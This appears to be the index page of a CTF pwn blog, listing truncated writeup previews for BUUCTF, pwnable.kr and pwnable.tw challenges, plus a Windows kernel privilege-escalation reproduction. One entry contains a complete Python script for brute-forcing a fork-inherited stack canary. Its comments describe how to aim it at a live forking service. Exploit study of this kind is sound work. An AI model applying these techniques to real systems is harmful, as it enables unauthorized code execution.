PWN
Notes on learning PWN: CTF pwn writeups and vulnerability reproduction.
fa1c4
Software security graduate student, occasional blogger (
BUUCTF pwn wp 146 - 150
hitcontraining_playfmt, gwctf_2019_easy_pwn, bctf2016_bcloud, asis2016_b00ks, warmup
Original post · 2022-04-30 03:30:00 · 590 views · 0 comments
BUUCTF pwn wp 141 - 145
ciscn_2019_n_7, qctf_2018_stack2
falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2; checksec QCTF_2018_stack2
QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.
Original post · 2022-04-29 03:30:00 · 521 views · 0 comments
BUUCTF pwn wp 136 - 140
pwnable_asm, picoctf_2018_echooo, jarvisoj_level6_x64, npuctf_2020_level2, [2020 新春红包题]3
Original post · 2022-04-28 03:00:00 · 559 views · 0 comments
BUUCTF pwn wp 131 - 135
rootersctf_2019_srop, ciscn_2019_s_6, sctf_2019_easy_heap, de1ctf_2019_weapon, SWPUCTF_2019_p1KkHeap
Original post · 2022-04-27 03:30:00 · 597 views · 0 comments
[DiceCTF 2022] interview-opportunity
interview-opportunity
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[10]; // [rsp+6h] [rbp-1Ah] BYREF
  const char **v5; // [rsp+10h] [rbp-10h]
  int v6; // [rsp+1Ch] [rbp-4h]
  v6 = argc;
  v5 = argv;
  env_setup(argc, arg
Original post · 2022-04-18 02:15:00 · 591 views · 0 comments
BUUCTF pwn wp 126 - 130
gyctf_2020_document, ciscn_2019_final_5, roarctf_2019_realloc_magic, houseoforange_hitcon_2016, SWPUCTF_2019_login
Original post · 2022-03-31 00:48:46 · 1739 views · 0 comments
Hitcon CTF 2016 - house of orange 做题笔记
Preface: to go deeper into the advanced heap exploitation techniques of pwn, house of orange is a hurdle that cannot be avoided. I had already come across the house series of challenges, but the psychological pressure kept me from actually debugging the house vulnerabilities. Now there is no way around it, so I intend to concentrate on breaking through house of orange. You have to level up before you can beat the boss, but to level up you first have to beat the boss (kidding~). Analysis: the CTFhub and BUUCTF versions of the challenge differ; I'll go with the BUU one. Exploitation. Summary. References...
Original post · 2022-03-31 00:21:52 · 1195 views · 0 comments
BUUCTF pwn wp 121 - 125
qctf2018_stack2, 强网杯2019 拟态 STKOF (QWB 2019 "Mimic" STKOF), zctf_2016_note3, bcloud_bctf_2016, hgame2018_flag_server
hgame2018_flag_server
$ file flag_server; checksec flag_server
flag_server: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically
Original post · 2022-03-24 21:31:18 · 741 views · 0 comments
BUUCTF pwn wp 116 - 120
[BSidesCF 2019]Runit
$ file runit; checksec runit
runit: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=fdd5061644dc69c2e4f2a0e98091901b4
Original post · 2022-03-06 10:58:00 · 422 views · 0 comments
BUUCTF pwn wp 111 - 115
judgement_mna_2016, actf_2019_babyheap, gyctf_2020_signin, wdb_2018_3rd_soEasy, gyctf_2020_some_thing_interesting
Original post · 2022-03-03 22:28:53 · 403 views · 0 comments
BUUCTF pwn wp 106 - 110
picoctf_2018_buffer overflow 0, xman_2019_format, ciscn_2019_en_3, bjdctf_2020_YDSneedGrirlfriend, picoctf_2018_are you root
Original post · 2022-03-03 22:28:43 · 515 views · 0 comments
BUUCTF pwn wp 101 - 105
wustctf2020_number_game, ciscn_2019_final_2, wustctf2020_easyfast (already covered: https://blog.csdn.net/qq_33976344/article/details/120132888), starctf_2019_babyshell, wustctf2020_name_your_dog
Original post · 2022-03-03 22:28:26 · 368 views · 0 comments
BUUCTF pwn wp 96 - 100
axb_2019_heap
(master*)$ file axb_2019_heap; checksec axb_2019_heap
axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
Original post · 2022-02-23 21:48:24 · 741 views · 0 comments
BUUCTF pwn wp 91 - 95
[ACTF新生赛2020]rome (ACTF Freshman Contest 2020)
int func()
{
  int result; // eax
  int v1[4]; // [esp+14h] [ebp-44h]
  unsigned __int8 v2; // [esp+24h] [ebp-34h] BYREF
  unsigned __int8 v3; // [esp+25h] [ebp-33h]
  unsigned __int8 v4; // [esp+26h] [ebp-32h]
  unsigned __int8 v5; // [e
Original post · 2022-02-21 15:45:55 · 619 views · 0 comments
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
Preface: this is a local privilege escalation vulnerability in the system ancillary function driver Afd.sys, addressed in the patches Microsoft released in October 2011 (bulletin MS11-080); it affects Windows XP and Windows Server 2003. The root cause is that the Microsoft Windows Ancillary Function Driver (afd.sys) does not properly validate user-supplied data, so a local attacker can exploit it to execute arbitrary code in kernel mode and elevate privileges. Vulnerability analysis. Exploitation. Summary...
Original post · 2022-01-26 14:46:42 · 3351 views · 0 comments
[Windows]内核调试环境搭建
Preface: to explore Windows kernel fuzzing, I started last year by learning the basics of Windows reverse engineering, then spent nine months learning the various Linux pwn exploitation techniques from scratch (I haven't really studied Windows pwn yet, but the principles are basically the same, and I'll pick up the techniques when I need them). Recently I've looked at a bit of the Windows driver development stack (though I didn't understand much of it), so now I can start studying Windows kernel exploitation, again from scratch. This post briefly covers setting up a Windows kernel debugging environment. Environment setup: if you follow the setup method in the 0day book, the process
Original post · 2022-01-20 14:48:41 · 758 views · 0 comments
pwnable.kr wp uaf
Challenge
Mommy, what is Use After Free bug?
ssh uaf@pwnable.kr -p2222 (pw:guest)
Solution
#include <fcntl.h>
#include <iostream>
#include <cstring>
#include <cstdlib>
#include <unistd.h>
using namespace std;
class Human{
private:
  vir
Original post · 2022-01-19 14:51:38 · 202 views · 0 comments
pwnable.kr wp cmd2
Challenge
Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
cmd1's flag: mommy now I get what PATH environment
Original post · 2022-01-19 14:51:17 · 251 views · 0 comments
pwnable.kr wp cmd1
Challenge
Mommy! what is PATH environment in Linux?
ssh cmd1@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
#include <string.h>
int filter(char* cmd){
  int r=0;
  r += strstr(cmd, "flag")!=0;
  r += strstr(cmd, "sh")!=0;
  r += strstr(cmd, "tmp")!
Original post · 2022-01-19 14:51:00 · 175 views · 0 comments
pwnable.kr wp lotto
Challenge
Mommy! I made a lotto program for my homework.
do you want to play?
ssh lotto@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
unsigned char submit[6];
void play()
Original post · 2022-01-19 14:50:30 · 283 views · 0 comments
pwnable.kr wp blackjack
Challenge
Hey! check out this C implementation of blackjack game!
I found it online
* http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html
I like to give my flags to millionaires.
how much money you got?
Running at : nc pwnable.kr 9
Original post · 2022-01-19 14:50:08 · 123 views · 0 comments
pwnable.kr wp coin1
Challenge
Mommy, I wanna play a game!
(if your network response time is too slow, try nc 0 9007 inside pwnable.kr server)
Running at : nc pwnable.kr 9007
Solution
falca@DESKTOP-GKDU8KD:/mnt/c/Windows/System32$ nc pwnable.kr 9007
-----------------------------
Original post · 2022-01-19 14:49:48 · 259 views · 0 comments
pwnable.kr wp shellshock
Challenge
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)
ssh shellshock@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
int main(){
  setresuid(getegid(), getegid(), getegid());
  setresgid(getegid(),
Original post · 2022-01-19 14:49:29 · 209 views · 0 comments
BUUCTF pwn wp 86 - 90
mrctf2020_shellcode_revenge
A classic challenge: printable-character shellcode. F5 (decompilation) fails, so read the assembly directly.
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near
buf= byte ptr -410h
var_8= dword ptr -8
var_4= dword ptr -4
; __unwi
Original post · 2022-01-17 17:24:24 · 647 views · 0 comments
pwnable.kr wp mistake
Challenge
We all make mistakes, let's move on.
(don't take this too seriously, no fancy hacking skill is required at all)
This task is based on real event
Thanks to dhmonkey
hint : operator priority
ssh mistake@pwnable.kr -p2222 (pw:guest)
Solution
#include <std
Original post · 2022-01-17 17:22:41 · 190 views · 0 comments
pwnable.kr wp leg
Challenge
Daddy told me I should study arm.
But I prefer to study my leg!
Download : http://pwnable.kr/bin/leg.c
Download : http://pwnable.kr/bin/leg.asm
ssh leg@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
#include <fcntl.h>
int key1(){
  asm
Original post · 2022-01-17 17:22:23 · 197 views · 0 comments
pwnable.kr wp input
Challenge
Mom? how can I pass my input to a computer program?
ssh input2@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
int main(int argc,
Original post · 2022-01-17 17:21:23 · 232 views · 0 comments
pwnable.kr wp random
Challenge
Daddy, teach me how to use random value in programming!
ssh random@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
int main(){
  unsigned int random;
  random = rand(); // random value!
  unsigned int key=0;
  scanf("%d", &key);
  if( (key
Original post · 2022-01-17 17:20:53 · 103 views · 0 comments
pwnable.kr wp passcode
Challenge
Mommy told me to make a passcode based login system.
My initial C code was compiled without any error!
Well, there was some compiler warning, but who cares about that?
ssh passcode@pwnable.kr -p2222 (pw:guest)
Solution
#include <stdio.h>
#include <
Original post · 2022-01-17 17:20:33 · 235 views · 0 comments
pwnable.kr wp flag
Challenge
Papa brought me a packed present! let's open it.
Download : http://pwnable.kr/bin/flag
This is reversing task. all you need is binary
Solution
// positive sp value has been detected, the output may be wrong!
_BYTE *__fastcall sub_44A560(_BYTE *a1, _BYTE *a
Original post · 2022-01-17 17:19:53 · 276 views · 0 comments
pwnable.kr wp bof
Challenge
Nana told me that buffer overflow is one of the most common software vulnerability. Is that true?
Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
Solution
#include <stdio.h>
#include <st
Original post · 2022-01-17 17:19:31 · 118 views · 0 comments
pwnable.kr wp collision
Challenge
Daddy told me about cool MD5 hash collision today.
I wanna do something like that too!
ssh col@pwnable.kr -p2222 (pw:guest)
Solution
scp -rP2222 col@pwnable.kr:/home/col/* .   (copy the files to the local machine)
falca@DESKTOP-GKDU8KD:/mnt/k/PWN/pwnable.kr/collision$ scp -rP2222 col@pwna
Original post · 2022-01-17 17:19:08 · 114 views · 0 comments
picoCTF pwn wp - Guessing Game 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#define BUFSIZE 512
long get_random() {
  return rand;
}
int get_version() {
  return 2;
}
int do_stuff() {
  long ans .
Original post · 2021-06-25 15:33:03 · 417 views · 1 comment
BUUCTF pwn wp 16 - 20
[HarekazeCTF2019]baby_rop
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[16]; // [rsp+0h] [rbp-10h] BYREF
  system("echo -n \"What's your name? \"");
  __isoc99_scanf("%s", v4);
  printf("Welcome to the Pwn World, %s!\n", v4
Original post · 2021-08-24 16:15:57 · 535 views · 0 comments
BUUCTF pwn wp 11 - 15
ciscn_2019_n_8
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]
  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
Original post · 2021-08-17 23:09:17 · 452 views · 0 comments
pwnable.tw wp - hacknote
Preface: hacknote on pwnable.tw, a challenge similar to the hacknote on 攻防世界 (adworld). Analysis: the add function, which is reasonable enough:
unsigned int add()
{
  int v0; // ebx
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]
  v
Original post · 2021-09-21 16:02:12 · 228 views · 0 comments
NJCTF 2017-messager
First checksec: partial RELRO, canary and NX are enabled. You can create your own flag and attack locally: echo "flag{Mine}" > flag. Run the binary, then check the listening port with netstat: port 5555. Analysis of main: the program communicates over a socket, and along the way it reads the flag into buf. sub_400BC6 sends the flag, so the return address to hijack the process to is known: 0x400BC6. Because a fork()ed child inherits the parent's canary unchanged, the canary can be brute-forced byte by byte (a wrong guess only kills the child; the parent keeps accepting connections with the same value). Once the canary is known, overwrite the return address to hijack control flow to s
Original post · 2021-01-26 10:44:16 · 1394 views · 4 comments
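The fork-shared canary brute force described above, as an added example that is not part of the original writeup or the messager challenge: a small Python simulation with no pwntools dependency that recovers an 8-byte canary one byte at a time. make_oracle, the offset BUF_LEN = 0x48 and the constructed canary are assumptions standing in for the real service; against the actual binary, child_survives would send the probe over the socket and report whether the child answered normally or died with the "stack smashing detected" abort.

```python
import os

# Assumed distance from the start of the overflowed buffer to the canary.
# Not taken from the messager binary; adjust after measuring the real stack frame.
BUF_LEN = 0x48


def make_oracle(canary: bytes, buf_len: int = BUF_LEN):
    """Constructed stand-in for the forking service.

    The parent process generates its canary once; every fork()ed child inherits
    the same value, so a wrong guess kills only that child and the next
    connection sees an identical canary. The oracle reports whether a probe
    leaves the child alive, i.e. whether the bytes written over the canary
    still match its prefix (no __stack_chk_fail).
    """
    def child_survives(probe: bytes) -> bool:
        overwritten = probe[buf_len:]            # bytes that landed on the canary
        return canary.startswith(overwritten)    # prefix intact -> child keeps going
    return child_survives


def build_probe(known: bytes, guess: int, buf_len: int = BUF_LEN) -> bytes:
    """Fill the buffer, replay the bytes already recovered, append one guess."""
    return b"A" * buf_len + known + bytes([guess])


def brute_force_canary(child_survives, width: int = 8):
    """Recover the canary one byte at a time; returns (canary, probes_sent).

    Each byte needs at most 256 probes, so the whole 8-byte value costs at most
    2048 connections instead of 2**64 guesses. On x86-64 Linux the lowest byte
    is always 0x00 (so a string copy stops there), and the search finds it on
    the first probe.
    """
    known = b""
    probes = 0
    for _ in range(width):
        for guess in range(256):
            probes += 1
            if child_survives(build_probe(known, guess)):
                known += bytes([guess])
                break
        else:
            # No byte kept the child alive: the canary is not stable across
            # connections (no fork, or re-exec per client), so this attack
            # does not apply.
            raise RuntimeError("no byte kept the child alive; not a fork-style target")
    return known, probes


if __name__ == "__main__":
    secret = b"\x00" + os.urandom(7)            # constructed canary, low byte zero
    recovered, n = brute_force_canary(make_oracle(secret))
    assert recovered == secret
    print(f"canary = {recovered.hex()} after {n} probes")
```

The byte-at-a-time search only works because the oracle distinguishes "child survived" from "child aborted" and the value does not change between tries; a service that re-executes per connection regenerates the canary and the loop ends in the RuntimeError branch.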
ADworld pwn wp - Recho
Input of arbitrary length is accepted, so there is an overflow, but after the overflow the program reads input again and keeps running; unless the loop can be exited, control flow cannot be hijacked. A pwntools function is used here to close the input stream, which ends the loop:
def shutdown(self, direction = "send"):
    """shutdown(direction = "send")
    Closes the tube for further reading or writing depending on `direction`.
    Ar..
Original post · 2021-06-27 20:33:12 · 173 views · 0 comments
BUUCTF pwn wp 56 - 60
others_babystack
Bypass the canary, then stack overflow.
from pwn import *
from LibcSearcher import *
url, port = "node4.buuoj.cn", 26959
filename = "./babystack"
elf = ELF(filename)
# libc = ELF("./")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")
local =
Original post · 2021-10-09 22:38:30 · 269 views · 0 comments
ADworld pwn wp - pwn-200
An obvious stack overflow; dynamically linked, no libc provided. Exploitation: ret2libc, the standard template approach, using pwntools' DynELF module to leak libc addresses. It works by leaking memory through puts or write, so there are two prerequisites: the vulnerability must let you leak arbitrary addresses, and it must be reusable (ret back to the start of the function and keep executing). The write function: header #include <unistd.h>; prototype ssize_t write(int fd, const void *buf, size_t count); description: write(...
Original post · 2021-06-25 15:32:13 · 156 views · 1 comment